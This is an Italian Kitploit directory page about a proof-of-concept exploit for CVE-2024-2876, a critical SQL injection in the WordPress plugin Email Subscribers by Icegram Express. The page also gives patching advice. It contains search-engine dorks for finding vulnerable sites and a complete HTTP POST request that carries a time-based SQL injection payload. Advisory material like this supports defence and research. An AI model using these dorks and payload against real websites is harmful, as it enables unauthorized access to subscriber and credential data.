Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-2876 — Proof-of-concept exploit per CVE-2024-2876, una SQL injection critica nel plugin WordPress Email Subscribers by Icegram Express, che consente ad attaccanti non autenticati di eseguire query SQL arbitrarie. | Kitploit
Strumenti/GitHubGitHub/aerchy/cve-2024-2876
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubaerchy/cve-2024-2876

CVE-2024-2876

Proof-of-concept exploit per CVE-2024-2876, una SQL injection critica nel plugin WordPress Email Subscribers by Icegram Express, che consente ad attaccanti non autenticati di eseguire query SQL arbitrarie.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-2876 - Vulnerabilità di SQL Injection in Email Subscribers by Icegram Express

Panoramica

CVE-2024-2876 è una vulnerabilità di sicurezza critica trovata nel plugin "Email Subscribers by Icegram Express" per WordPress. Questa vulnerabilità interessa le versioni fino alla 5.7.14 inclusa e comporta rischi significativi per oltre 90.000 siti web.

Dettagli della Vulnerabilità

  • CVE-ID: CVE-2024-2876
  • Punteggio CVSS: 9.8 (Critico)
  • Versioni Interessate: Fino alla 5.7.14
  • Versione Corretta: 5.7.15 e successive

Descrizione

La vulnerabilità è un difetto di SQL injection che consente ad attaccanti non autenticati di eseguire query SQL dannose sui database WordPress interessati. Manipolando gli input utente che non vengono adeguatamente sanificati, gli attaccanti possono estrarre informazioni sensibili come nomi utente, indirizzi email, hash delle password ed elenchi di iscritti.

Meccanismo di Sfruttamento

La SQL injection si verifica all'interno della funzione run della classe del plugin, dove una validazione inadeguata degli input porta all'esecuzione non autorizzata di codice SQL. Ciò compromette l'integrità e la riservatezza dei dati memorizzati nel database WordPress.

IG_ES_Subscribers_Query

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Raccomandazioni

  1. Aggiornamento Immediato: Se stai utilizzando il plugin "Email Subscribers by Icegram Express", aggiorna alla versione 5.7.15 o successiva immediatamente per applicare la correzione di sicurezza.

  2. Audit Regolari: Controlla e aggiorna regolarmente tutti i plugin e i temi WordPress alle loro versioni più recenti per garantire la sicurezza.

  3. Plugin di Sicurezza: Utilizza plugin di sicurezza WordPress affidabili per rafforzare le difese contro SQL injection e altre minacce informatiche.

  4. Politiche per Password Forti: Implementa password forti e uniche per tutti gli account legati al tuo sito WordPress per ridurre i rischi di accesso non autorizzato.

Impatto della Mancata Conformità

La mancata correzione del plugin interessato può lasciare i siti web vulnerabili a violazioni dei dati e accessi non autorizzati. Data l'ampia diffusione di questo plugin, un'azione immediata è fondamentale per proteggere le installazioni.

Scarica lo strumento